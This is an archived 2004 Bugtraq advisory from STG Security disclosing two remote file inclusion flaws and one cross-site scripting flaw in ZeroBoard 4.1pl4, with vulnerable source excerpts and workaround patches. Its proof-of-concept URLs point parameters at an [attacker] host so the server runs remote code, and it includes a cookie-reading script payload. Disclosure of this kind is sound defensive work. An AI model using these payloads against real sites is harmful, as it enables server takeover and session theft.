lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20041224010233.12802.qmail@www.securityfocus.com>
Date: 24 Dec 2004 01:02:33 -0000
From: <advisory@...security.com>
To: bugtraq@...urityfocus.com
Subject: STG Security Advisory: [SSA-20041220-16] PHP source injection and
    cross-site scripting vulnerabilities in ZeroBoard




STG Security Advisory: [SSA-20041220-16] PHP source injection and cross-site
scripting vulnerabilities in ZeroBoard

Revision 1.2
Date Published: 2004-12-20 (KST)
Last Update: 2004-12-24
Disclosed by SSR Team (advisory@...security.com)

Summary
=======
ZeroBoard is one of widely used web BBS applications in Korea. . However, an
input validation flaw can cause malicious attackers to run arbitrary
commands with the privilege of the HTTPD process, which is typically run as
the nobody user.


Vulnerability Class
===================
Implementation Error: Input validation flaw

Impact
======
High : arbitrary commands execution.

Affected Products
================
ZeroBoard 4.1pl4 and prior

Vendor Status: NOT FIXED
========================
2004-11-20 Vulnerabilities found.
2004-11-20 1st vendor contact, but they didn't replied.
2004-11-22 2nd vendor contact, but they didn't replied.
2004-12-13 STG Security, Inc. customer notified.
2004-12-24 Official release.

Details
=======
Vulnerability 1 : PHP source injection vulnerability
- - ------------------------------------
- - - Proof of concept
http://[victim]/outlogin.php?_zb_path=ftp://[attacker]/pub/

- - - Environment
PHP 5.0.x
php.ini : register_globals = On

- - - Description
As of PHP 5.0.0, file_exists() can be used with URL wrappers explained at
http://www.php.net/manual/en/function.file-exists.php. Thus _zb_path
parameter in outlogin.php can be easily exploited.

- - - Part of vulnerable source, outlogin.php.
- - ----
// &#51228;&#47196;&#48372;&#46300; &#46356;&#47113;&#53664;&#47532; &#51064;&#51648; &#52404;&#53356;
if(!file_exists($_zb_path."lib.php")) {
  echo "&#51228;&#47196;&#48372;&#46300; &#46356;&#47113;&#53664;&#47532;&#44032; &#50500;&#45785;&#45768;&#45796;";
  return;
}

// _head.php &#51069;&#51020;
@include $_zb_path."_head.php";

}
- - ----

Vulnerability 2 : PHP source injection vulnerability
- - ------------------------------------
- - - Proof of concept
http://[victim]/include/write.php?dir=http://[attacker]/


- - - Environment
php.ini: register_globals = On

- - - Reason
Uninitialized $dir variable in write.php


- - - Part of vulnerable source, include/write.php
- - ----
include $dir."/write.php";
- - ----

Vulnerability 3 : Cross-site scripting vulnerability
- - --------------------------------------
- - - Proof of concept
http://[victim]/check_user_id.php?user_id=&lt;script&gt;alert(document.cookie)</sc
ript>


- - - Reason
check_user_id.php doesn't validate the input value of user_id.

- - - Part of vulnerable source, check_user_id.php
- - ----
$user_id = trim($user_id);
... &#49373;&#47029; ...
if($check[0]) echo "$user_id &#45716; &#51060;&#48120; &#46321;&#47197;&#46108;<br> &#50500;&#51060;&#46356;&#51077;&#45768;&#45796;";
else echo"$user_id &#45716; &#49324;&#50857;&#54616;&#49892;&#49688; &#51080;&#49845;&#45768;&#45796;";
... &#49373;&#47029; ...
- - ----


Workaround
==========
Without official patches of theses vulnerability, modify the vulnerable
sources as following recommendations.

Vulnerability 1: As of zboard 4.1pl4
- - ----------------------------
Insert the following code at 59th line of outlogin.php,

if(eregi(":\/\/",$_zb_path)) $_zb_path="";


Vulnerability 2: As of zboard 4.1pl4
- - ----------------------------
Insert the following code at 15th line of include/write.php,

if(eregi(":\/\/",$dir)) $dir="";


Vulnerability 3: As of zboard 4.1pl4
- - ----------------------------
Insert the following code at 3rd line of check_user_id.php,

$user_id = htmlspecialchars(trim($user_id));


Credits
======
Jeremy Bae at STG Security


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ